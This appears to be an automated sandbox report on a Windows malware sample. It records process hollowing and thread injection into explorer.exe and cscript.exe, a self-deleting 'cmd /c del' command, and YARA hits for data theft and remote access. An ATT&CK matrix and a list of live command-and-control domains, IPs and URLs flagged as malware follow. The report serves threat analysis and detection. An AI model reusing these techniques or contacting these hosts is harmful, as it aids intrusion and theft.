      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34267090 mov eax, dword ptr fs:[00000030h]2_2_34267090
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34276090 mov eax, dword ptr fs:[00000030h]2_2_34276090
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426C0E0 mov ecx, dword ptr fs:[00000030h]2_2_3426C0E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DB0D6 mov eax, dword ptr fs:[00000030h]2_2_341DB0D6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DB0D6 mov eax, dword ptr fs:[00000030h]2_2_341DB0D6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DB0D6 mov eax, dword ptr fs:[00000030h]2_2_341DB0D6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DB0D6 mov eax, dword ptr fs:[00000030h]2_2_341DB0D6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341FB0D0 mov eax, dword ptr fs:[00000030h]2_2_341FB0D0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421D0F0 mov eax, dword ptr fs:[00000030h]2_2_3421D0F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3421D0F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D90F8 mov eax, dword ptr fs:[00000030h]2_2_341D90F8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D90F8 mov eax, dword ptr fs:[00000030h]2_2_341D90F8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D90F8 mov eax, dword ptr fs:[00000030h]2_2_341D90F8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D90F8 mov eax, dword ptr fs:[00000030h]2_2_341D90F8
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DC0F6 mov eax, dword ptr fs:[00000030h]2_2_341DC0F6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34217128 mov eax, dword ptr fs:[00000030h]2_2_34217128
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34217128 mov eax, dword ptr fs:[00000030h]2_2_34217128
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DF113 mov eax, dword ptr fs:[00000030h]2_2_341DF113
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E510D mov eax, dword ptr fs:[00000030h]2_2_341E510D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3426A130 mov eax, dword ptr fs:[00000030h]2_2_3426A130
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3429F13E mov eax, dword ptr fs:[00000030h]2_2_3429F13E
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420510F mov eax, dword ptr fs:[00000030h]2_2_3420510F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34210118 mov eax, dword ptr fs:[00000030h]2_2_34210118
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421716D mov eax, dword ptr fs:[00000030h]2_2_3421716D
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3423717A mov eax, dword ptr fs:[00000030h]2_2_3423717A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3423717A mov eax, dword ptr fs:[00000030h]2_2_3423717A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DA147 mov eax, dword ptr fs:[00000030h]2_2_341DA147
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DA147 mov eax, dword ptr fs:[00000030h]2_2_341DA147
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341DA147 mov eax, dword ptr fs:[00000030h]2_2_341DA147
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B5149 mov eax, dword ptr fs:[00000030h]2_2_342B5149
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E6179 mov eax, dword ptr fs:[00000030h]2_2_341E6179
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427D140 mov eax, dword ptr fs:[00000030h]2_2_3427D140
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427D140 mov eax, dword ptr fs:[00000030h]2_2_3427D140
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427314A mov eax, dword ptr fs:[00000030h]2_2_3427314A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427314A mov eax, dword ptr fs:[00000030h]2_2_3427314A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427314A mov eax, dword ptr fs:[00000030h]2_2_3427314A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427314A mov eax, dword ptr fs:[00000030h]2_2_3427314A
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B3157 mov eax, dword ptr fs:[00000030h]2_2_342B3157
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B3157 mov eax, dword ptr fs:[00000030h]2_2_342B3157
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B3157 mov eax, dword ptr fs:[00000030h]2_2_342B3157
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421415F mov eax, dword ptr fs:[00000030h]2_2_3421415F
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421E1A4 mov eax, dword ptr fs:[00000030h]2_2_3421E1A4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3421E1A4 mov eax, dword ptr fs:[00000030h]2_2_3421E1A4
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342141BB mov ecx, dword ptr fs:[00000030h]2_2_342141BB
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342141BB mov eax, dword ptr fs:[00000030h]2_2_342141BB
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342141BB mov eax, dword ptr fs:[00000030h]2_2_342141BB
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342B51B6 mov eax, dword ptr fs:[00000030h]2_2_342B51B6
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E4180 mov eax, dword ptr fs:[00000030h]2_2_341E4180
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E4180 mov eax, dword ptr fs:[00000030h]2_2_341E4180
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E4180 mov eax, dword ptr fs:[00000030h]2_2_341E4180
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342131BE mov eax, dword ptr fs:[00000030h]2_2_342131BE
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342131BE mov eax, dword ptr fs:[00000030h]2_2_342131BE
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221190 mov eax, dword ptr fs:[00000030h]2_2_34221190
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34221190 mov eax, dword ptr fs:[00000030h]2_2_34221190
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34209194 mov eax, dword ptr fs:[00000030h]2_2_34209194
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E0 mov eax, dword ptr fs:[00000030h]2_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E0 mov eax, dword ptr fs:[00000030h]2_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E0 mov eax, dword ptr fs:[00000030h]2_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E0 mov eax, dword ptr fs:[00000030h]2_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E0 mov eax, dword ptr fs:[00000030h]2_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E0 mov eax, dword ptr fs:[00000030h]2_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420B1E0 mov eax, dword ptr fs:[00000030h]2_2_3420B1E0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A81EE mov eax, dword ptr fs:[00000030h]2_2_342A81EE
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_342A81EE mov eax, dword ptr fs:[00000030h]2_2_342A81EE
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F1F0 mov eax, dword ptr fs:[00000030h]2_2_3420F1F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3420F1F0 mov eax, dword ptr fs:[00000030h]2_2_3420F1F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_3427D1F0 mov eax, dword ptr fs:[00000030h]2_2_3427D1F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F01C0 mov eax, dword ptr fs:[00000030h]2_2_341F01C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F01C0 mov eax, dword ptr fs:[00000030h]2_2_341F01C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F51C0 mov eax, dword ptr fs:[00000030h]2_2_341F51C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F51C0 mov eax, dword ptr fs:[00000030h]2_2_341F51C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F51C0 mov eax, dword ptr fs:[00000030h]2_2_341F51C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F51C0 mov eax, dword ptr fs:[00000030h]2_2_341F51C0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D91F0 mov eax, dword ptr fs:[00000030h]2_2_341D91F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D91F0 mov eax, dword ptr fs:[00000030h]2_2_341D91F0
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F01F1 mov eax, dword ptr fs:[00000030h]2_2_341F01F1
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F01F1 mov eax, dword ptr fs:[00000030h]2_2_341F01F1
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341F01F1 mov eax, dword ptr fs:[00000030h]2_2_341F01F1
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341D81EB mov eax, dword ptr fs:[00000030h]2_2_341D81EB
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E91E5 mov eax, dword ptr fs:[00000030h]2_2_341E91E5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341E91E5 mov eax, dword ptr fs:[00000030h]2_2_341E91E5
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]2_2_341EA1E3
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]2_2_341EA1E3
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]2_2_341EA1E3
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]2_2_341EA1E3
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_341EA1E3 mov eax, dword ptr fs:[00000030h]2_2_341EA1E3
      Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 2_2_34222C30 NtMapViewOfSection,LdrInitializeThunk,2_2_34222C30

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 52.20.84.62 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.177.169.252 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.39 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 18.119.154.66 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 34.120.249.181 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.123 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.12.93.8 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.digitalserviceact.online
      Source: C:\Windows\explorer.exeNetwork Connect: 185.104.28.238 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 158.247.235.89 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.18.233.42 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.247.82.94 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.197.227.142 80Jump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: C0000Jump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeThread register set: target process: 5384Jump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 5384Jump to behavior
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeProcess created: C:\Users\user\Desktop\MaMsKRmgXZ.exe C:\Users\user\Desktop\MaMsKRmgXZ.exeJump to behavior
      Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\MaMsKRmgXZ.exe"Jump to behavior
      Source: explorer.exe, 00000004.00000003.11262903343.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11268545969.000000000D0C3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D0C3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd?
      Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.9895456281.0000000004880000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000004.00000000.9891803655.0000000000AE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14560591151.0000000000AE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
      Source: explorer.exe, 00000004.00000000.9892778780.0000000001230000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.14562867145.0000000001231000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\MaMsKRmgXZ.exeCode function: 0_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403235

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000005.00000002.14563558300.0000000004530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9970004470.0000000033E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14563427538.0000000004500000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.9948810061.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Native API
      1
      Registry Run Keys / Startup Folder
      1
      Access Token Manipulation
      1
      Rootkit
      1
      Credential API Hooking
      21
      Security Software Discovery
      Remote Services1
      Credential API Hooking
      Exfiltration Over Other Network Medium1
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Shared Modules
      1
      DLL Side-Loading
      512
      Process Injection
      1
      Masquerading
      LSASS Memory2
      Virtualization/Sandbox Evasion
      Remote Desktop Protocol1
      Archive Collected Data
      Exfiltration Over Bluetooth4
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Registry Run Keys / Startup Folder
      2
      Virtualization/Sandbox Evasion
      Security Account Manager2
      Process Discovery
      SMB/Windows Admin Shares1
      Clipboard Data
      Automated Exfiltration3
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      DLL Side-Loading
      1
      Access Token Manipulation
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer113
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script512
      Process Injection
      LSA Secrets3
      File and Directory Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Deobfuscate/Decode Files or Information
      Cached Domain Credentials3
      System Information Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items3
      Obfuscated Files or Information
      DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading
      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1324095 Sample: MaMsKRmgXZ.exe Startdate: 11/10/2023 Architecture: WINDOWS Score: 100 31 www.xlrj.asia 2->31 33 www.start399.com 2->33 35 21 other IPs or domains 2->35 45 Snort IDS alert for network traffic 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 11 MaMsKRmgXZ.exe 2 33 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 11->29 dropped 14 MaMsKRmgXZ.exe 6 11->14         started        process6 dnsIp7 43 103.72.68.128, 50012, 80 FARIYA-PKFariyaNetworksPvtLtdPK India 14->43 59 Modifies the context of a thread in another process (thread injection) 14->59 61 Maps a DLL or memory area into another process 14->61 63 Sample uses process hollowing technique 14->63 65 Queues an APC in another process (thread injection) 14->65 18 explorer.exe 3 1 14->18 injected signatures8 process9 dnsIp10 37 www.holzleisten24.shop 130.185.109.77, 50019, 80 XIRRADE Germany 18->37 39 www.senior-living-91799.bond 104.247.82.94, 50027, 80 TEAMINTERNET-CA-ASCA Canada 18->39 41 13 other IPs or domains 18->41 53 System process connects to network (likely due to code injection or exploit) 18->53 22 cscript.exe 12 18->22         started        signatures11 process12 signatures13 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      MaMsKRmgXZ.exe100%AviraHEUR/AGEN.1331786
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://www.ps212naming.comReferer:0%Avira URL Cloudsafe
      http://www.pwpholdings.comReferer:0%Avira URL Cloudsafe
      https://th.bing.0%Avira URL Cloudsafe
      http://www.pwpholdings.com0%Avira URL Cloudsafe
      http://www.nala.dev/ro12/100%Avira URL Cloudmalware
      http://www.los3.online/ro12/www.start399.com100%Avira URL Cloudmalware
      http://www.xlrj.asia/ro12/www.fathomtackle.com100%Avira URL Cloudmalware
      http://www.doubleapus.com/ro12/100%Avira URL Cloudmalware
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://www.los3.online/ro12/100%Avira URL Cloudmalware
      http://www.riderarea.com/ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/100%Avira URL Cloudmalware
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://www.nala.dev/ro12/www.rptiki.com100%Avira URL Cloudmalware
      http://www.fathomtackle.com/ro12/www.digitalserviceact.online100%Avira URL Cloudmalware
